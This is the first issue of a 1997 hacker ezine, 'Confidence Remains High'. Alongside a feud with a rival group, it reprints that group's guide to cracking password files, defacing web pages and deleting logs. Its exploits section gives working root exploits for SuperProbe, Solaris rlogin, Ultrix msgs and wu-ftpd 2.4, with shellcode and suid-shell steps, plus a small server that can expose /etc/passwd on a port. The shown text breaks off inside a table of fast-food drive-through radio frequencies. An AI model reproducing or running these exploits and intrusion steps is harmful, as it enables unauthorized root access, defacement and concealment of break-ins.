ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== =--------------------=====================================--------------------= =--------------------= Status : Confidence Remains High. =--------------------= =--------------------= Issue : 001. =--------------------= =--------------------= Date : April 16th 1997. =--------------------= =--------------------=====================================--------------------= =============================================================================== ==================> http://el8.netgates.co.uk coming s00n <================== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .:. Site Of The Month .:. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ -----------------------> http://micros0ft.paranoia.com <----------------------- ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ In This Issue : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ -----=> Section A : Introduction And Cover Story. 1. Welcome To Issue 1 Of Confidence Remains High......: Tetsu Khan 2. sIn eXposed........................................: The CodeZero + Friends -----=> Section B : Exploits And Code. 1. SuperProbe.........................................: Solar Designer 2. Ultrix Exploit.....................................: StatioN 3. Solaris 2.5 / 2.5.1 rlogin Exploit.................: Jeremy Elson 4. wu-ftpd 2.4(1) Exploit.............................: Eugene Schultz 5. portmsg.c..........................................: Some FTP Someplace.. -----=> Section C : Phones / Scanning / Radio. 1. Fast Food Restuarant Frequencies...................: Dj Gizmo 2. Robbing Stores With Phones, A Real Example.........: The CrackHouse 3. How To Rewire Your House For Free Phone Calls......: WildFire -----=> Section D : Miscellaneous. 1. Hacking Electrical Items Part 2, The Sequel........: Tetsu Khan 2. Virus Definitions..................................: so1o 3. Fun With whois, sinnerz.com........................: so1o 4. Hacking Space Shuttles, Abort Codes................: NailGun 5. Country Domain Listing.............................: SirLance -----=> Section E : World News. 1. CoreWars...........................................: so1o / odÝphreak 2. Technophoria Want A Piece Of CodeZero Too?.........: so1o 3. Global kOS Press Release...........................: Spidey 4. www.ncaa.com Hack Makes News.......................: so1o 5. CodeZero To Release sunOS 5.x RootKit..............: so1o 6. Too Many nethosting.com Break-Ins..................: so1o 7. sulfur of #hack to print a bi-monthly magazine.....: so1o ------=> Section F : Projects. 1. IP Spoofing Programs And Utilities.................: Dr_Sp00f 2. Using LinuxRootKitIII..............................: suid -----=> Section G : The End. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Welcome To Issue 1 Of Confidence Remains High : Tetsu Khan ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Confidence Remains High will be issued EVERY 50 DAYS as from April 16th... It is free, not like 2600, or sulfur's (hes 15 years old, and he loves emmanuel btw.) Access Denied, which both cost *YOU*, the reader MONEY, cash, $$$ etc. which we don't like, because information should be free, and so, we bring you Confidence Remains High, with news, exploits, scanning, telco, and enough shit to make you wonder "why did I ever pay cash for this?!" anyway, on with the show... .:. Confidence Remains High will s00n be available at .:. -----------------=>> http://confidence.netgates.co.uk <<=------------------ Until then...check out... http://www.mastaz.org/codezero/ http://ulticonn.dyndns.com/codezero/ Confidence Remains High is issued every 50 days as from April 16th, as then, issue 20 will be released on New Years Day 2000 (if we go that far!) Tetsu Khan. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. sIn eXposed : CodeZero + Friends. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ If you cant be bothered to read all this shit, just go to... ---------------> www.sinnerz.com/bible.htm <--------------- ...And view the lameness for yourself :) ------------------------------------------------------------------------------- Concerning the news in issue 2 of the CodeZero technical journal, we found this response (http://www.sinnerz.com/codezero.txt) : 7 So has anyone here heard of Codezero? Its some ezine type shit that i just wanted to expose as bullshit. I had never heard of it till i talked to darkfool and he showed me... You can check it out at neonunix.org/codezero. It is pretty good for a laugh. When me and Banshee and Messiah first read it we all were in #sin and the first thing to come to our mind was.. wtf is this? Some hacker gossip column or what? Even more funny was the surprise i got when i saw that the editor was Tetsu Khan (so1o who was mentioned earlier in the Bible)... that brought a smile to my face to see that. Anyways so i was reading thru issue 2 of codezero and i happend to see a lot of bogus information...stuff said that wasn't true. Same with the first issue. Examples our comments like "Infected has some new programs coming out soon including Utopia an encryption program by The Messiah." Anyways im doing the algorithm for that program with Messiah and it is not going to be out for a long time... Messiah has a lot of plans for the future all coming before Utopia does.... Those are the exact, untouched words of HosTiÝe of SiN, hmmm, lets examine that passage more closely... "some ezine type shit that i just wanted to expose as bullshit..." "i was reading thru issue 2 of codezero and i happend to see a lot of bogus information...stuff said that wasn't true..." This is very interesting indeed, that they should care about a small news section in the journal isn't it? seeing that we published how many lines about them? a whole 20 I hear you say? hmm...doesn't the journal have exploits and other stuff in it to? I think it does... "Anyways im doing the algorithm for that program with Messiah and it is not going to be out for a long time... Messiah has a lot of plans for the future all coming before Utopia does...." So then HoStiÝe, you can program now? thats new, and *YOU* are coding the algorithm? intersting... WAIT! you are saying that Utopia is true? and that we did publish correct information? I always thought so, seeing that the truth is that you probably wanted your beautiful new program to be a big surpise to the "scene"... Heh, how silly of me to actually think you had a clue! You just can't take it that you are stuck in a lame fuck group of wannabes and the truth is finally coming out...Let us examine more examples found on www.sinnerz.com : It also had some shit like "4 new hacks were reported this month" and they were right on the 4 new hacks part but they put bogus shit about them. The catch22 one they happend to put the html for it.. well they put the wrong shit that was on it. Becuz on the catch22 hack Darkfool had put the names of all the SIN members on the page. Which they decided to leave out... also They put some weird shit which they said was on the 2 hacks Darkfool did. Where it was the entersin.gif from our page that was there with a bunch of other links. Anyways there is also a lot of other shit that was bullshit in both of their issues... SHoCk HoRRoR !!!! Darkfool was responsible for the www.catch22.com hack ?? and SiN was linked to the hacks too?? That is interesting news HoSTiÝe, seeing you just could have landed one of your SiN members in trouble, as CodeZero didn't mention any names concerning the catch22.com hack, and the very first index.html to go up, which was the one we published was infact very correct, its just that the index.html must have changed how many times that day? hmmm... "...wrong shit that was on it. Becuz on the catch22 hack Darkfool had put the names of all the SIN members on the page. Which they decided to leave out..." Strange...seeing another hacker, by the name of Sventa, was blamed entirely for the attacks. Oh yeah, one last thing, in the index.html that was apparently modified by Darkfool of SiN, there were 8 numbers, we know what they stand for, SiN doesn't, all will be explained one day, as SiN are cl00less and need a good kicking. Let us continue, with a "hacking guide" taken from www.sinnerz.com : -------------------------------------------------------------------- _________ ___ _______ \~=._ _.=~/ / _____/ | | \ \ \~=._ _.=~/ \ ~=__=~ / \_____ \ | | / | \ \ ~=__=~ / \_.=~ ~=._/ / \ | |/ | \ \_.=~ ~=._/ _.=~ \ / ~=._ /_______ / |___|\____|__ / .=~ \ / ~=. L------\------/------7 \/ \/ L------\------/------7 \ / \ / \ / http://www.sinnerz.com \ / \/ \/ OK, this is my mini guide to the easiest 'hacking' there is ( I think ) if any one knows different then mail me and tell me :) . Most FTP servers have the directory /pub which stores all the 'public' information for you to download. But along side /pub you will probably find other directorys such as /bin and /etc its the /etc directory which is important. In this directory there is normally a file called passwd. . This looks something like this :- root:7GHgfHgfhG:1127:20:Superuser jgibson:7fOsTXF2pA1W2:1128:20:Jim Gibson,,,,,,,:/usr/people/jgibson:/bin/csh tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh This is where all the user names and passwords are kept. For example, root is the superuser and the rest are normal users on the site. The bit after the word root or mcn such as in this example (EUyd5XAAtv2dA) is the password BUT it is encrypted. So you use a password cracker....which you can d/l from numerous sites which I will give some URL's to at the end of this document. With these password crackers you will be asked to supply a passwd. file which you download from the \etc directory of the FTP server and a dictionary file which the crackers progam will go through and try to see if it can make any match. And as many people use simple passwords you can use a 'normal' dictionary file. But when ppl REALLY don't want you to break their machines they set their passwords to things such as GHTiCk45 which Random Word Generator will create (eventually ). Which is where programs such as Random Word Generator come in. ( Sorry just pluging my software ) BTW the bad news is that new sites NORMALLY have password files which look like this :- root:x:0:1:0000-Admin(0000):/:/sbin/sh The x signifies shadowed - you can't use a cracker to crack it because there's nothing there to crack, its hidden somewhere else that you can't get to. x is also represented as a * or sometimes a . Ones like the top example are known as un-shadowed password files normally found at places with .org domain or .net and prehaps even .edu sites. (Also cough .nasa.gov cough sites). If you want a normal dictionary file i recommend you go to http://www.globalkos.org and download kOS Krack which has a 3 MEG dictionary file. Then run a .passwd cracking program such as jack the ripper or hades or killer crack ( I recommend ) against the .passwd file and dictionary file. Depending upon the amount of passwords in the .passwd file, the size of the dictionary file and the speed of the processor it could be a lengthy process. Eventually once you have cracked a password you need a basic knowledge of unix. I have included the necassary commands to upload a different index.html file to a server :- Connect to a server through ftp prefably going through a few shells to hide your host and login using the hacked account at the Login: Password: part. Then once connected type dir or list If there's a directory called public_html@ or something similar change directory using the Simple dos cd command ( cd public_html ) Then type binary to set the mode to binary transfer ( so you can send images if necassary ) Then type put index.html or whatever the index file is called. It will then ask which transfer you wish to use, Z-Modem is the best. Select the file at your end you wish to upload and send it. Thats it ! If you have root delete any log files too. Please note that this process varys machine to machine. To change the password file for the account ( very mean ) login in through telnet and simply type passwd at the prompt and set the password for the account to anything you wish. Thats it....if ya don't understand it read it about 10x if ya still don't ask someone else i am too busy with errrr stuff.. Links :- http://www.sinnerz.com Where you got this I hope. Stay cool and be somebodys fool everyone Darkfool darkfool@pancreas.com http://www.sinnerz.com --- Ummm, *NEWS FLASH*, lets see shall we, this tells attackers to retrieve the passwd file using what?! FTP I hear you scream? well, lets see shall we children, gather 'round... "Most FTP servers have the directory /pub which stores all the 'public' information for you to download. But along side /pub you will probably find other directorys such as /bin and /etc its the /etc directory which is important. In this directory there is normally a file called passwd. . This looks something like this :-" Oh dear, oh dear, oh dear, lets look at the FACTS : Common FTP passwd path : /home/ftp/etc/passwd *REAL* passwd path : /etc/passwd Hmm, lets see, anyone with a clue would know that the FTP passwd file is not real, it is only there to mislead little wannabes, examples iclude members of SiN. We continue... "Eventually once you have cracked a password you need a basic knowledge of unix. I have included the necassary commands to upload a different index.html file to a server :- Connect to a server through ftp prefably going through a few shells to hide your host and login using the hacked account at the Login: Password: part. Then once connected type dir or list If there's a directory called public_html@ or something similar change directory using the Simple dos cd command ( cd public_html ) Then type binary to set the mode to binary transfer ( so you can send images if necassary ) Then type put index.html or whatever the index file is called. It will then ask which transfer you wish to use, Z-Modem is the best. Select the file at your end you wish to upload and send it. Thats it !" Okay, so now, SiN defines hacking as downloading the /home/ftp/etc/passwd which is a decoy, and then proceed to get kOS Krack (last time I checked www.globalkos.org was down) and then try to crack the passwd file and finally use FTP to upload an index.html? how imaginative and original, pity all of this info you have been fed is absolute crap, with a success rate of practically zero. One last thing... "If you have root delete any log files too." Umm, but you havent told all our wannabe hackers that read your shit where the log files are found, seeing that you have to find them, delete them, then touch them, oh yeah, I thought you were using FTP? strange... Im sure that from these examples we have fowarded to you we have started to prove the truth behind SiN, seeing they are actually quite lame wannabes with very minimal skills...this has been shown, and we will continue to add to this hall of shame for SiN, as until now, no-one has stood up to them, but now it is time for a change. Watch this space my friends, Until next time... T_K I wish I was in sIn, I dew I dew! I dew!! sIn is 3r33t!! -- so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. SuperProbe : Solar Designer ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /* * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1 * by Solar Designer 1997. */ #include #include #include char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd" "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40" "\x31\xdb\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 8192 #define alignment 0 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize / 2; i += 4) *(char **)&buffer[i] = get_sp() - 2048; memset(&buffer[bufsize / 2], 0x90, bufsize / 2); strcpy(&buffer[bufsize - 256], shellcode); setenv("SHELLCODE", buffer, 1); memset(buffer, 'x', 72); *(char **)&buffer[72] = get_sp() - 6144 - alignment; buffer[76] = 0; execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. Ultrix Exploit : StatioN ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This bug has been fixed in OSF, but not in Ultrix. It should also work on any system that has the msgs mail alias. $ grep msgs /etc/aliases msgs: "|/usr/ucb/msgs -s" Ok, the first thing to do is look in the /usr/msgs directory (or whatever the directory is where the msgs files are kept), and see what the next msgs file will be (if there is 1 and 2, then the next one is pretty easy to figure out). Then, make an executable /tmp/a that like makes a suid shell (this is pretty easy to do, if you can't do it, don't consider yourself a hacker). By default, newsyslog executes every 6 days at 4 am, but it depends on the setup in crontab. What it does is age the syslog file (at /usr/adm/syslog.1, .2, ..., i think). symlink /usr/msgs/ -> /usr/adm/newsyslog $ telnet telnet> o localhost 25 mail shit, version, etc expn msgs 250 <"| /usr/ucb/msgs -s"> mail from: <`/tmp/a`> rcpt to: msgs data doesn't matter what you put here . quit So now, when it writes to /usr/msgs/, it will overwrite /usr/adm/newsyslog, and since /usr/adm/newsyslog is a shell script, it will expand `/tmp/a` by executing /tmp/a AS ROOT, giving you an suid shell or whatever /tmp/a does. From there, just clean up after yourself. StatioN ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Solaris 2.5 / 2.5.1 rlogin Exploit : Jeremy Elson ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /* * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines * by exploiting the gethostbyname() overflow in rlogin. * * gcc -o rlogin-exploit rlogin-exploit.c * * Jeremy Elson, * jeremy.elson@nih.gov */ #include #include #include #include #define BUF_LENGTH 8200 #define EXTRA 100 #define STACK_OFFSET 4000 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode); long_p = (u_long *) buf; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; targ_addr = get_sp() - STACK_OFFSET; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = targ_addr; printf("Jumping to address 0x%lx\n", targ_addr); execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0); perror("execl failed"); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. wu-ftpd 2.4(1) Exploit : Eugene Schultz ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This sploit is a teeny bit outdated, but I have been asked by many people about exploiting FTP recently... This shows you how to use the wuftp2.4(1) hole to gain root. ------------------------------------------------------------ On the VICTIM system, compile the following C code: --------------------------------------------------- main() { setuid(0); seteuid(0); system("cp /bin/sh /tmp/suidroot"); system("chmod a+rwxs /tmp/suidroot"); } Now create a shell script, called root.sh, that contains the following: ----------------------------------------------------------------------- exec a.out <----- a.out is the name of the compiled C code Now, FTP localhost, login as your account on that system and: ------------------------------------------------------------- ftp> quote site exec sh root.sh Then quit FTP and execute /tmp/suidroot to become root! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 5. portmsg.c : Some FTP Someplace.. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ /**************************************************************************/ /* portmsg - generate a message on a port, then close connection */ /* */ /* Usage: portmsg file port */ /* */ /* When a telnet client connects to the specified port, the */ /* text from the file will be echoed to the user. After a */ /* short delay the connection will close. */ /* */ /* eg. portmsg /etc/passwd 666 */ /* */ /***************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include wait_on_child() { union wait status; while (wait3(&status, WNOHANG, (struct rusage *) 0) > 0) ; } lostconn() { exit(1); } main(argc, argv) int argc; char *argv[]; { int msgfd, fd, n; struct stat statBuf; int port; char *msg; int sockfd, newsockfd; int addrlen; int opt; struct sockaddr_in tcp_srv_addr; struct sockaddr_in their_addr; if (argc != 3) { fprintf(stderr, "Usage: portmsg file port\n"); exit(1); } port = atoi(argv[2]); if (port == 0) { fprintf(stderr, "error: bad port number [%s]\n", argv[2]); exit(1); } if ((msgfd = open(argv[1], O_RDONLY)) < 0) { fprintf(stderr, "error: cannot open message file [%s]\n", argv[1]); exit(1); } /* read the message */ fstat(msgfd, &statBuf); if (statBuf.st_size <= 0) { fprintf(stderr, "error: message file [%s] is empty\n", argv[1]); exit(1); } msg = (char *)malloc(statBuf.st_size); if (read(msgfd, msg, statBuf.st_size) != statBuf.st_size) { fprintf(stderr, "error: cannot read message file [%s]\n", argv[1]); exit(1); } /* become a daemon */ switch(fork()) { case -1: fprintf(stderr, "error: can't fork\n"); exit(1); case 0: break; default: exit(0); } if (setpgrp(0, getpid()) == -1) { fprintf(stderr, "error: can't change process group\n"); exit(1); } if ((fd = open("/dev/tty", O_RDWR)) >= 0) { ioctl(fd, TIOCNOTTY, NULL); close(fd); } (void)signal(SIGCLD, wait_on_child); bzero((char *) &tcp_srv_addr, sizeof(tcp_srv_addr)); tcp_srv_addr.sin_family = AF_INET; tcp_srv_addr.sin_addr.s_addr = htonl(INADDR_ANY); tcp_srv_addr.sin_port = htons(port); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { fprintf(stderr, "can't create stream socket\n"); exit(-1); } opt = 1; if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *) &opt, sizeof(opt)) < 0) { perror("setsockopt"); exit(1); } if (bind(sockfd, (struct sockaddr *)&tcp_srv_addr, sizeof(tcp_srv_addr)) < 0) { fprintf(stderr, "can't bind local address\n"); exit(-1); } listen(sockfd, 5); main_again: addrlen = sizeof (their_addr); newsockfd = accept(sockfd, (struct sockaddr *) &their_addr, &addrlen); if (newsockfd < 0) { if (errno == EINTR) goto main_again; fprintf(stderr, "accept error\n"); exit(-1); } switch(fork()) { case -1: fprintf(stderr, "server can't fork\n"); exit(-1); case 0: dup2(newsockfd, 0); dup2(newsockfd, 1); for (n = 3; n < NOFILE; n++) close(n); break; default: close(newsockfd); goto main_again; } /* daemon child arrives here */ (void)signal(SIGPIPE, lostconn); (void)signal(SIGCHLD, SIG_IGN); fprintf(stdout, msg); (void)fflush(stdout); sleep(5); exit(0); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Fast Food Restuarant Frequencies : Dj Gizmo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ If you got a scanner and or transciever that works with these frequencies, then you could have some serious phun... ------------------------------------------------------------------------------- RESTAURANT CUSTOMER (R) CLERK (I) LOCATION ------------------------------------------------------------------------------- Arby's 30.8400 154.5700 Nationwide Bess Eaton Donut 457.5375 467.7625 Rhode Island Big Boy 30.8400 154.5700 UNKNOWN OH area 457.6000 467.8250 UNKNOWN OH area Burger King 30.8400 154.5700 UNKNOWN OH area 31.0000 170.3050 UNKNOWN GA area 33.4000 154.5400 Frederick, MD 457.5500 467.7750 Baltimore, MD area 457.5625 467.7875 Nationwide 457.5750 467.8000 UNKNOWN area 457.6000 467.8250 UNKNOWN area 460.8875 465.8875 Nationwide 461.5375 UNKNOWN UNKNOWN OH area Burgerville 30.8400 154.5700 UNKNOWN OH area Dairy Queen 30.8400 154.5700 UNKNOWN OH area 460.8875 465.8875 UNKNOWN OH area 920.2625 WFM UNKNOWN Halifax, Nova Scotia Dunkin Donuts 30.8400 154.5700 UNKNOWN NH area 33.1600 154.5150 UNKNOWN NH area 33.4000 154.5400 UNKNOWN NH area El Mexicano 464.9625 469.9625 Germantown, MD G.D. Ritzy's 35.1000 UNKNOWN UNKNOWN OH area Hardee's 30.8400 154.5700 Nationwide 31.0000 170.3050 UNKNOWN NC area 457.5375 467.7625 UNKNOWN OH area 460.8875 465.8875 UNKNOWN OH area 461.0875 466.0875 UNKNOWN OH area 461.1125 466.1125 Aurora, IL area Jack in the Box 33.4000 154.5400 San Jose, CA Kenny Rogers Roasters 469.0125 464.0125 Frederick, MD Chicken Kentucky Fried Chicken 30.8400 154.5700 Occoquan, VA area 31.0000 170.3050 UNKNOWN MN area 33.1400 151.8950 UNKNOWN OH area 35.0200 154.6000 Frederick, MD 457.5875 467.8125 Vienna, VA area 457.6000 467.8250 UNKNOWN OH area 460.8875 465.8875 Washington, DC area 462.7625 467.8875 Washington, DC area McDonald's CANADA 30.8400 151.6700 main freq. Canada 30.8400 154.1450 aux. freq. Canada McDonald's U.S.A. 30.8400 154.5700 San Diego, CA area 31.0000 170.3050 UNKNOWN OH/NC area 33.1400 151.8950 Nationwide 33.1400 170.3050 Southfield, MI area 33.4000 154.5400 Frederick, MD 33.4000 154.5700 UNKNOWN area ** 35.0200 151.8950 UNKNOWN area ** 35.0200 154.4900 Decatur, IN area 35.0200 154.6000 Nationwide 151.7150 169.4450 Washington, DC area 151.7450 UNKNOWN UNKNOWN OH area 151.7750 171.9050 UNKNOWN OH area 154.5700 170.2450 Nationwide 154.6000 171.1050 Nationwide 155.0000 UNKNOWN UNKNOWN OH area 457.5375 461.0875 UNKNOWN OH area 457.5500 467.7750 UNKNOWN OH area 457.6000 467.8250 UNKNOWN OH area 460.8875 465.8875 UNKNOWN OH area 461.0375 466.0375 UNKNOWN OK/CA area 461.0875 466.0875 UNKNOWN OH area 462.1625 467.1625 UNKNOWN OH area 463.2875 468.2875 UNKNOWN NY area 464.5125 UNKNOWN UNKNOWN OH area 469.0125 464.0125 Germantown, MD 469.1875 464.1875 Frederick, MD 920.5000 WFM 903.5000 WFM Gaithersburg, MD Rally's 457.5375 468.3875 UNKNOWN OH area 461.0875 466.0875 UNKNOWN OH area 461.5375 462.1625 Holland OH area Roy Rogers 30.8400 154.5700 Germantown, MD 457.5375 467.7625 Washington, DC area 469.0125 464.0125 Germantown, MD 469.9250 464.9250 Vienna, VA Taco Bell 30.8400 154.5700 Washington, DC area 33.1600 154.5150 Frederick, MD 33.4000 154.5400 Germantown, MD 460.8875 465.8875 Nationwide 461.0875 466.0875 UNKNOWN OH area 461.5375 UNKNOWN UNKNOWN OH area 464.9625 469.9625 UNKNOWN OH area 469.0125 464.0125 Reston, VA Wendy's 33.4000 154.5400 Rockville, MD 49.8300 49.8900 UNKNOWN area ** 457.5125 467.7375 UNKNOWN OH area 457.5375 467.7625 UNKNOWN OH area 